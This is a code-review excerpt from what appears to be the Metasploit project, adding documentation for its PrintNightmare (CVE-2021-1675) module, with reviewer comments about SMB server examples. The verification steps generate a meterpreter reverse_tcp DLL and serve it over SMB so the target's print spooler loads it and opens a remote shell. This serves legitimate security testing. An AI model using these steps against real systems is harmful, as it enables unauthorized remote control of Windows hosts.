documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md

```diff
@@ -0,0 +1,94 @@
+## Vulnerable Application
+The print spooler service can be abused to load a remote DLL through a crafted DCERPC request.
+
+## Verification Steps
+
+1. Optionally, create a DLL payload that the target will execute
+    1. From msfconsole
+    1. Do: `use payload/windows/x64/meterpreter/reverse_tcp`
+    1. Set the `LHOST` and `LPORT` values
+    1. Do: `to_handler` to start the payload handler
+    1. Do: `generate -f dll -o /path/to/save/the/payload.dll` to generate the DLL file
+1. Start an SMB server with anonymous read access containing the DLL payload
```

Comment:
An example of how to do this using a tool like Impacket's `smbserver.py` might be a good idea to give an example for people who might be curious how to do this.

Reply:
Will update the documentation with some examples when I land this.

Reply:
Additional documention added with https://github.com/rapid7/metasploit-framework/commit/70fd9376e3ad83a52e12fe0237fb8f6459db9cdd which fixes this.